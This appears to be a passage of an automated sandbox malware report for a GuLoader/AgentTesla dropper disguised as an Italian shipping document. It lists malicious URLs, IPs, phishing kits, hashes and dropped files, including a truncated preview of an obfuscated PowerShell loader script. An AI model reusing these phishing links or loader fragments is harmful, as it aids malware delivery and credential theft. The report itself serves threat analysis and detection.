                  http://pub-647efec841f2469ea102ef18827f7780.r2.dev/secure_response.htmlGet hashmaliciousGreatness Phishing Kit, HTMLPhisherBrowse
                  • 104.26.12.205
                  http://pub-afa55f53401b48e6ad155daf536ad34c.r2.dev/utility_base.htmlGet hashmaliciousGreatness Phishing Kit, HTMLPhisherBrowse
                  • 104.26.13.205
                  http://pub-4d560104a89740f899e90e13245f1971.r2.dev/secure_response.htmlGet hashmaliciousGreatness Phishing Kit, HTMLPhisherBrowse
                  • 172.67.74.152
                  http://pub-853a8c6d224746258050ceb1dd4dc8c3.r2.dev/response_auth.htmlGet hashmaliciousGreatness Phishing Kit, HTMLPhisherBrowse
                  • 172.67.74.152

                  ASNs

                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  DATACLUB-NLDocumenti di spedizione 0009333000459595995.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                  • 185.29.11.53
                  PO 00009876660887666000.bat.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                  • 84.38.133.121
                  Bankcopyscanneddoc.exeGet hashmaliciousRedLineBrowse
                  • 84.38.129.21
                  xCjIO3SCur0S.exeGet hashmaliciousRemcosBrowse
                  • 185.29.11.23
                  new.cmdGet hashmaliciousGuLoaderBrowse
                  • 185.29.11.28
                  temp.cmdGet hashmaliciousUnknownBrowse
                  • 185.29.11.28
                  price_request_.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                  • 185.29.11.62
                  disprovable.dllGet hashmaliciousCryptOne, QbotBrowse
                  • 84.38.133.191
                  BL.xlsGet hashmaliciousLokibotBrowse
                  • 84.38.129.114
                  kej177el6.dllGet hashmaliciousQbotBrowse
                  • 84.38.133.191
                  UNIFIEDLAYER-AS-1USDocumenti di spedizione 0009333000459595995.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                  • 192.185.13.234
                  Audio_Msg..00290663894983Transcript.htmlGet hashmaliciousHTMLPhisherBrowse
                  • 162.215.211.9
                  rPO_CW00402902400438.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                  • 162.241.27.20
                  Shipping Document.exeGet hashmaliciousAgentTeslaBrowse
                  • 162.214.80.31
                  https://wbh.sxx.temporary.site/Get hashmaliciousUnknownBrowse
                  • 50.6.160.227
                  https://pnp.zfx.mybluehost.me/wp-content/it/web/login.php/Get hashmaliciousUnknownBrowse
                  • 50.6.153.149
                  https://hr.schoolrundriver.com/system/fonts/wordpress/CHASEGet hashmaliciousUnknownBrowse
                  • 192.232.218.112
                  https://rb.gy/5ow3t3Get hashmaliciousUnknownBrowse
                  • 50.6.153.151
                  https://sjc.hgp.mybluehost.me/binance/bnb/access/account/login.php/Get hashmaliciousUnknownBrowse
                  • 50.6.153.107
                  http://www.icontci.com.br/ch/Swisscom/Swisscom/Swisscom-login/login/kunden/Get hashmaliciousUnknownBrowse
                  • 108.179.253.238
                  CLOUDFLARENETUSGJecwa34.cpl.exeGet hashmaliciousUnknownBrowse
                  • 1.1.1.1
                  rdoc17000320240923070456.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                  • 188.114.97.3
                  John Lorenz-Employee-Benefits.docxGet hashmaliciousHTMLPhisherBrowse
                  • 104.17.25.14
                  Documenti di spedizione 0009333000459595995.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                  • 104.26.13.205
                  John Lorenz-Employee-Benefits.docxGet hashmaliciousHTMLPhisherBrowse
                  • 188.114.97.3
                  BL.xlsGet hashmaliciousRemcos, PureLog StealerBrowse
                  • 188.114.97.9
                  Audio_Msg..00290663894983Transcript.htmlGet hashmaliciousHTMLPhisherBrowse
                  • 172.67.143.206
                  https://app.pipefy.com/public/phase_redirect/f86fa292-1317-4dc5-8112-3af168025951?origin=emailGet hashmaliciousHTMLPhisherBrowse
                  • 104.19.148.54
                  rPO_CW00402902400438.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                  • 188.114.96.3
                  Contract_Agreement_Tuesday September 2024.pdfGet hashmaliciousUnknownBrowse
                  • 104.21.90.101

                  JA3 Fingerprints

                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  3b5074b1b5d032e5620f69f9f700ff0erdoc17000320240923070456.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                  • 172.67.74.152
                  Documenti di spedizione 0009333000459595995.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                  • 172.67.74.152
                  CCE_000110.exeGet hashmaliciousAgentTeslaBrowse
                  • 172.67.74.152
                  CCE_000110.exeGet hashmaliciousUnknownBrowse
                  • 172.67.74.152
                  SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeGet hashmaliciousXWormBrowse
                  • 172.67.74.152
                  https://app.pipefy.com/public/phase_redirect/f86fa292-1317-4dc5-8112-3af168025951?origin=emailGet hashmaliciousHTMLPhisherBrowse
                  • 172.67.74.152
                  rPO_CW00402902400438.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                  • 172.67.74.152
                  https://docs.google.com/drawings/d/1Dvdk477POfuN_FWT5xAcbUon_2qhv7627e0t5q44TO8/preview?pli=1Get hashmaliciousHTMLPhisherBrowse
                  • 172.67.74.152
                  rPEDIDO-M456.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                  • 172.67.74.152
                  rMT103SwiftCopyoFPayment.exeGet hashmaliciousAgentTeslaBrowse
                  • 172.67.74.152

                  Dropped Files

                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  C:\Users\user\AppData\Local\Temp\nsl39F4.tmp\nsExec.dllDocumenti di spedizione 0009333000459595995.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                    4hIPvzV6a2.exeGet hashmaliciousUnknownBrowse
                      SecuriteInfo.com.PUA.Tool.InstSrv.10.14191.25974.exeGet hashmaliciousUnknownBrowse
                        SecuriteInfo.com.PUA.Tool.InstSrv.10.14191.25974.exeGet hashmaliciousUnknownBrowse
                          3Dut8dFCwD.exeGet hashmaliciousUnknownBrowse
                            Ms63nDrOBa.exeGet hashmaliciousUnknownBrowse
                              SecuriteInfo.com.PUA.Tool.InstSrv.10.1046.23999.exeGet hashmaliciousUnknownBrowse
                                SecuriteInfo.com.PUA.Tool.InstSrv.10.1046.23999.exeGet hashmaliciousUnknownBrowse
                                  rSCAN31804.exeGet hashmaliciousGuLoader, RemcosBrowse
                                    rSCAN31804.exeGet hashmaliciousGuLoaderBrowse
                                      C:\Users\user\AppData\Local\acneform\Documenti di spedizione 0009333000459595995.exeDocumenti di spedizione 0009333000459595995.exeGet hashmaliciousAgentTesla, GuLoaderBrowse

                                        Created / dropped Files

                                        C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                        Download File
                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:data
                                        Category:modified
                                        Size (bytes):8003
                                        Entropy (8bit):4.840877972214509
                                        Encrypted:false
                                        SSDEEP:192:Dxoe5HVsm5emd5VFn3eGOVpN6K3bkkjo5xgkjDt4iWN3yBGHVQ9smzdcU6CDQpOR:J1VoGIpN6KQkj2qkjh4iUx5Uib4J
                                        MD5:106D01F562D751E62B702803895E93E0
                                        SHA1:CBF19C2392BDFA8C2209F8534616CCA08EE01A92
                                        SHA-256:6DBF75E0DB28A4164DB191AD3FBE37D143521D4D08C6A9CEA4596A2E0988739D
                                        SHA-512:81249432A532959026E301781466650DFA1B282D05C33E27D0135C0B5FD0F54E0AEEADA412B7E461D95A25D43750F802DE3D6878EF0B3E4AB39CC982279F4872
                                        Malicious:false
                                        Reputation:moderate, very likely benign file
                                        Preview:PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....

                                        C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                        Download File
                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):2520
                                        Entropy (8bit):5.3958247593238235
                                        Encrypted:false
                                        SSDEEP:48:tNyFWSU4xympjgs4RIoU99tlNWR83tVAqVbB0Xjvxs8MXgeRGRXNcWpV6hhjt:tNmLHxvCsIfAXW8rBNB0XjZs8EgiGgW+
                                        MD5:1DDB787A64168EE3263E4D4CD00EB4F2
                                        SHA1:FA2D382FD185D0E11F543B06938ADEAAEC4AFDB8
                                        SHA-256:2699A78A6B6D8357248BB538798FAA7AB5FBBB52F58E67E2791DC361AB1A6490
                                        SHA-512:87B74AFCD2081678DB7012B4DA14EC9B328C3004375265ACBD18DBAAC4199CAF829D01A006B67C042B27430625B202B02CA9C67465D4032B626DF6A8D71DBC5B
                                        Malicious:false
                                        Reputation:low
                                        Preview:@...e.................................^..............@..........P................1]...E...........(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..4.....................@.[8]'.\........System.Data.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServicesH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.<...............V.}...@...i...........System.Transactions.D....................+.H..!...e........System.Configuration.Ins

                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1lezt45t.jvf.psm1

                                        Download File
                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.038920595031593
                                        Encrypted:false
                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                        Malicious:false
                                        Reputation:high, very likely benign file
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2b3ib0pn.koe.ps1

                                        Download File
                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.038920595031593
                                        Encrypted:false
                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                        Malicious:false
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_eyckhu3o.ytd.ps1

                                        Download File
                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.038920595031593
                                        Encrypted:false
                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                        Malicious:false
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jy324ynn.1bt.psm1

                                        Download File
                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.038920595031593
                                        Encrypted:false
                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                        Malicious:false
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pduciuui.40x.ps1

                                        Download File
                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.038920595031593
                                        Encrypted:false
                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                        Malicious:false
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xnkotwsl.ch4.psm1

                                        Download File
                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.038920595031593
                                        Encrypted:false
                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                        Malicious:false
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                        C:\Users\user\AppData\Local\Temp\nsl39F4.tmp\nsExec.dll

                                        Download File
                                        Process:\Device\CdRom1\Documenti di spedizione 0009333000459595995.exe
                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                        Category:dropped
                                        Size (bytes):7168
                                        Entropy (8bit):5.2959870663251625
                                        Encrypted:false
                                        SSDEEP:96:JwzdzBzMDhOZZDbXf5GsWvSv1ckne94SDbYkvML1HT1fUNQaSGYuH0DQ:JTQHDb2vSuOc41ZfUNQZGdHM
                                        MD5:B4579BC396ACE8CAFD9E825FF63FE244
                                        SHA1:32A87ED28A510E3B3C06A451D1F3D0BA9FAF8D9C
                                        SHA-256:01E72332362345C415A7EDCB366D6A1B52BE9AC6E946FB9DA49785C140BA1A4B
                                        SHA-512:3A76E0E259A0CA12275FED922CE6E01BDFD9E33BA85973E80101B8025EF9243F5E32461A113BBCC6AA75E40894BB5D3A42D6B21045517B6B3CF12D76B4CFA36A
                                        Malicious:false
                                        Antivirus:
                                        • Antivirus: ReversingLabs, Detection: 0%
                                        Joe Sandbox View:
                                        • Filename: Documenti di spedizione 0009333000459595995.exe, Detection: malicious, Browse
                                        • Filename: 4hIPvzV6a2.exe, Detection: malicious, Browse
                                        • Filename: SecuriteInfo.com.PUA.Tool.InstSrv.10.14191.25974.exe, Detection: malicious, Browse
                                        • Filename: SecuriteInfo.com.PUA.Tool.InstSrv.10.14191.25974.exe, Detection: malicious, Browse
                                        • Filename: 3Dut8dFCwD.exe, Detection: malicious, Browse
                                        • Filename: Ms63nDrOBa.exe, Detection: malicious, Browse
                                        • Filename: SecuriteInfo.com.PUA.Tool.InstSrv.10.1046.23999.exe, Detection: malicious, Browse
                                        • Filename: SecuriteInfo.com.PUA.Tool.InstSrv.10.1046.23999.exe, Detection: malicious, Browse
                                        • Filename: rSCAN31804.exe, Detection: malicious, Browse
                                        • Filename: rSCAN31804.exe, Detection: malicious, Browse
                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........................,.................Rich...........................PE..L...Q.d...........!......................... ...............................P............@..........................$..l.... ..P............................@....................................................... ...............................text............................... ..`.rdata..<.... ......................@..@.data........0......................@....reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................

                                        C:\Users\user\AppData\Local\acneform\Documenti di spedizione 0009333000459595995.exe

                                        Download File
                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                        Category:dropped
                                        Size (bytes):748488
                                        Entropy (8bit):7.618269683518012
                                        Encrypted:false
                                        SSDEEP:12288:nfLdembnSidSCwsYk8KSO4nMUBOGmJ9R01jS+VBtyS9TvkXFDsiJjWlWVB0mPH:nfLNnSsms/8K54nsVJ9F+VHtkXF4i7XH
                                        MD5:6C446FD0A3F6D498F5CBD0725CE7F232
                                        SHA1:D814C5F4BC9A61690318BA2ED8EC22D55AF16CCE
                                        SHA-256:8A149E1DED1CCE5485B9783687DD8F94C2F3926EDD17E62A682FE56CC73B1AE4
                                        SHA-512:7A2F40DE4785734831AB45945D2A7C0D610D597DB90AAC644FACA8C0A4F4D35A4D7D0B2C9397C41F8FC993B91D5EE4BDD5D1E870488CE49F11F34ECB3939B746
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: ReversingLabs, Detection: 8%
                                        Joe Sandbox View:
                                        • Filename: Documenti di spedizione 0009333000459595995.exe, Detection: malicious, Browse
                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1 ..PN..PN..PN.*_...PN..PO.JPN.*_...PN.s~..PN..VH..PN.Rich.PN.........................PE..L...l.d.................j..........25............@.......................................@..........................................P...d...........a..0............................................................................................text....h.......j.................. ..`.rdata..d............n..............@..@.data...............................@....ndata.......P...........................rsrc....d...P...f..................@..@................................................................................................................................................................................................................................................................................................................................................

                                        C:\Users\user\AppData\Local\acneform\Dyssen.Mod

                                        Download File
                                        Process:\Device\CdRom1\Documenti di spedizione 0009333000459595995.exe
                                        File Type:ASCII text, with very long lines (65536), with no line terminators
                                        Category:dropped
                                        Size (bytes):70325
                                        Entropy (8bit):5.158902637069244
                                        Encrypted:false
                                        SSDEEP:1536:7Y7brIQR5wdxbwMj3Li8faaKW0UW9AeKnXhSh04R/ID1d2Xnaah6:8HMQkbwMDlipG/BxfUIhl
                                        MD5:28CAA5C31A5E71EAE249CDDEB36BDC2E
                                        SHA1:0FA31BF12563C08257F3DEF568BBE50F12667418
                                        SHA-256:1248FC3D0506610988E6606216DB30BB9018A411DB91FEBA6F4E2860E98BC967
                                        SHA-512:E866F480B2ECD12324D9B5237B0B0EBFEA13582A8AEB6B1D143BD015C1F5971E4BDF350DBA46EE805696BB0A38422370BB6147F341AF1F8359ECF1BF047B0588
                                        Malicious:false
                                        Preview:$England=$Crispate;<#Skied Beggarly Chalkier Schematical daedaleous Opfinderpris #><#Ddssejlers Cress Suprastigmal #><#Kasketten Palaeornithinae Udstyrsforretningen #><#Ggeblommes Biseriate Fadlsankeret Pensaenes Resurcen #><#Blusteringly Spaltenumrene Parmesanosten #><#nervepatients Skibob Extragalactic Athenaea lykkes #>$Talemaskinen = "sti lne;,phinct`$ Ba,kereexcremelstyloaueRowel ec Hg edetGymnasirMembrano PublikpSfor ikh Unharmy Flau.ts mcgo.aiHealthio PolitilTornensoRverhisgFulmineiDrivgarc reweig=Feriela`$BilagetcCelestioNon nimlDiabetelTwirleduDiscip.s ElemeniOvercenoForraadnSammen.;Bindevvf Ramibiu PedatenRegres c Detentt NeckiniSelvagto gravrsnDokumen SkistvlRDiss,rtePo.yentt.lotricrbebudepaPreapplc Sulfa,tskribleoArtiller Amanues Under Fortovs( lumred`$TyndsliPSlikkero SnildesReval.itsnyltepeWisecrajGumlend2se iepr5Samfund3Rei rig,,videns`$alto.etRSobberaaParoxyslGraferslOestom,erverhi dResoluteBemgdhasChauvinr OpbevaeIn,ramndRechase9Chondr 9T lecom) R,euma Unvenee{,utcaro

                                        C:\Users\user\AppData\Local\acneform\afplingen.che

                                        Download File
                                        Process:\Device\CdRom1\Documenti di spedizione 0009333000459595995.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):245776
                                        Entropy (8bit):1.2423947315855175
                                        Encrypted:false
                                        SSDEEP:768:7x19EzEPqdI04IDk5wH/o606sFjlhpHi98oiQErpn6jGW3LSSW1Vn+7xd4R89Z9u:13ujvdGpic/cN2q8+js/5/H
                                        MD5:9F9EC5CB34B99692A4EAC963634A7D82
                                        SHA1:5C1C97F3B00365F6CDB43112D31D7DD3AA050870
                                        SHA-256:7579E3606C789ED66E555D541F14BDA6ECAEA4B2EB7B7BC3A25E7C804B3AB48F
                                        SHA-512:A574404306396B333F64FC16256C093CA1F2B6CF87E5675ED678F00DE3B899FFE4A95CBA4D1113B9C86B8C46549D06D7AB97930955F921CD73AE37D4067B1EB0
                                        Malicious:false
                                        Preview:......................................................{............J...............l....................w...........N....................................................................\.........................................|.........................{..............i.................................k...............!......&..............................................................................................................."...........................t.:...s............................................................A...................................................................d.........................2.......|................................................Y............&...............................5.......(................................`..............................*............i..........................................>........................................~.....................................................................................................I

                                        C:\Users\user\AppData\Local\acneform\forlggere.bov

                                        Download File
                                        Process:\Device\CdRom1\Documenti di spedizione 0009333000459595995.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):452228
                                        Entropy (8bit):1.250842541049128
                                        Encrypted:false
                                        SSDEEP:768:qlmssNPVJP2ri6hEVTp7WLL1GEOCTOemgej7kcwntQz2Y1drtNhgCV+AhB/7/dR+:5tvPloD3bnq3TzwesbDEfLeaz6oSzjU8
                                        MD5:30C2C02FB78EFAA65C6A38457A7DC4F6
                                        SHA1:40AEF6B9982695F88F0515104BFEEACFAF22FEDA
                                        SHA-256:CE57C2DEDAA3A0FD5F5C267F3336F5ACB6109D00D31A98D4638D26A77939CEFC
                                        SHA-512:8AC0B2E7831C801D7C4043195BEFC309F2C79BE719FF0171D0A4E580671EBADD2F737C307A4AAE2E548705CD11B24FE64F07C6E842D7DD5D3CCD88EA677BC7FA
                                        Malicious:false
                                        Preview:...........................................t..................................................................................................a..............d...........................o.........................=..#..............0.........<.........0.......................>..........`..........................................................................................:.........u.............................................0.................................C..~.............................................X......................................................"............................f........................................w.................................{............................"..................e........................................f...........l...............................................I............................ Z...........................;.............;.................................u.................................................................%....

                                        C:\Users\user\AppData\Local\acneform\okapier.Com

                                        Download File
                                        Process:\Device\CdRom1\Documenti di spedizione 0009333000459595995.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):344050
                                        Entropy (8bit):7.580146229974094
                                        Encrypted:false
                                        SSDEEP:6144:9ruXsLmgXj+a9etxVoOztIvtqYNsTOwJOBQ7Uv:9aumgXetHoStettqTOwaQYv
                                        MD5:39486BA352B5221ADE774BCECDE6F4DB
                                        SHA1:1E37B8B97559B16397301136B7B4ABFF7C50E86C
                                        SHA-256:9B9BFB77B758FA9BE7BDDB087F9E0893755B7455BC5AF6DA4E929E0EE3270D8D
                                        SHA-512:1DBA6E25006FA096DD90C7A64097D5F3CFBA857E14D4C32FBC9F4CA04E8E33D744B2C7048B569446024E9CF78577D4240C004BCF7ADE91839D7FAAE1CE864495
                                        Malicious:false
                                        Preview:....................j..hh....i........22..................................,,...$..AAA.............".._..........[.r.............U................^^^......PP........,.....qqq...................++.................|.#.....PPPPP............$$.R.NN...TTT...AA.jjjj.........................B.........y............~.666. .qqq.p...o................###...P..............p.......................5...................GG...........111........v...............SS....^...................z.D...nn.L.........:..........EEEE.ll..........####.^^................GGG................................7777...........Y...hh...w..............llll....A.u.JJ.M....t........8....[.|...-----.((.Z.RR...................................r.f.wwwwwww..s.....zzz..................q...D.........................................f.MM.|...............................................M.V..........K..mmm....R........!.........u..........m....3..........$$.....................uuu.............U...................D......LL..........W..........

                                        C:\Users\user\AppData\Local\acneform\rettersted.bef

                                        Download File
                                        Process:\Device\CdRom1\Documenti di spedizione 0009333000459595995.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):328009
                                        Entropy (8bit):1.2551228776153396
                                        Encrypted:false
                                        SSDEEP:1536:AfCPIKQLWsgBwj5eZNb+h+QkSGkJPsGyksKU:ATKZNbTQkSGky0sKU
                                        MD5:78C7002A6C29415CEA767894F99BDF01
                                        SHA1:37B39AF4E61D2A97D1B1AEA54D1C3C3D8C3AD6D8
                                        SHA-256:414BB9BB930F1269088CF9BF027667E6B9A4130E6E719E7C178406A8C8C3183E
                                        SHA-512:A39B5656AF287783AB4C5E211C148D2D233AB635E8D8C4870693D31267904E9C94A3BCC07B20F92C55F68BC7E6E2B5F1D22C6ED3F9B3A729CABD14B2E7B58D58
                                        Malicious:false
                                        Preview:..............................................A............................................]..............2.................................N.................................................................................................................................i.......................................................................................X............h...................j...........,............)...w....................................R.................................V...............................................................R.../.........................................)...................................................].............................,...v............................................./.......................................`........)........#..........x............H.....................................v..........K..........................................................................................................*............................

                                        C:\Users\user\AppData\Local\acneform\xenosaurid.txt

                                        Download File
                                        Process:\Device\CdRom1\Documenti di spedizione 0009333000459595995.exe
                                        File Type:ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):453
                                        Entropy (8bit):4.241518252490206
                                        Encrypted:false
                                        SSDEEP:6:mTXCFWRbo5FpTNrQNFqqhq48RZ8av8Atp3d6G4bg3pCp+oWKHYAtpcRvFVTZqIMC:0X4OA7aY48MNAtDMeExYAYdfqI1f1o2
                                        MD5:261F38F05E7DE27DA302C07B62E1F94D
                                        SHA1:8D495D43FC7A2B40C52B8D31678F24B519257610
                                        SHA-256:50D950EE2F6CD5D31AAA35B913DC46C8EEE3120B7444EF5EBB302B88851F3328
                                        SHA-512:62106A1D3608A63C12D6E9A7A00FD775ECD38193B779D4C13E18850230F1C7A1F0BD5DF0602AF5553F24BB0BAD6703BB9DC00C09C14E91DD098CE4EC95050E47
                                        Malicious:false
                                        Preview:stulls sprttede trlkvinder materialerne,disciplinerendes antirailwayist topchefs dhyana behovsanalyserne,vager cimnel bonderve debitable karyotin sadelmagervrkstederne samfundskonomien plakatopstning horologe vaner taleruafhaengigt..flimmer carryout arbejdsdisketterne breakaxe vidtaabne elastose.attestationerne mennonist rubicon barogrammerne respectively reddet overretention,brdknivenes yndlingsbog ministate paleogeographically repenalize henriett.

                                        C:\Users\user\Desktop\tmp.log

                                        Download File
                                        Process:C:\Windows\SysWOW64\cmd.exe
                                        File Type:ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):302
                                        Entropy (8bit):4.4126027758802335
                                        Encrypted:false
                                        SSDEEP:6:wvMYFVEh1IM6VZ1ErQNwvm/cHg2a9yotVU06X//F:wvMYFVEh156Vwnusg2a9ySVU06XV
                                        MD5:17C99C485FA2A13E5AA1ED2E49D1421E
                                        SHA1:90541F934AFFE8917E470CD02ADD5B6CDE503A2C
                                        SHA-256:208DE1CBAD2444DEF5DDE1A55320E22E7C88EFC1C9D4F9503980BE31029B13CD
                                        SHA-512:E9E411299D06DD3DD6FC66746646292426F383ABBC640D8C8EA70E3D2CAA81B47C7DF90AA6EA224B699D58429494FF654B20101D18B3CB414AB0F95AFC59D566
                                        Malicious:false
                                        Preview:....Attached : True..BlockSize : 0..DevicePath : \\.\CDROM1..FileSize : 1310720..ImagePath : C:\Users\user\Desktop\Ze1Ueabtx5.img..LogicalSectorSize : 2048..Number : 1..Size : 1310720..StorageType : 1..PSComputerName : ........

                                        \Device\CdRom1\Documenti di spedizione 0009333000459595995.exe

                                        Download File
                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                        Category:dropped
                                        Size (bytes):748488
                                        Entropy (8bit):7.618269683518012
                                        Encrypted:false
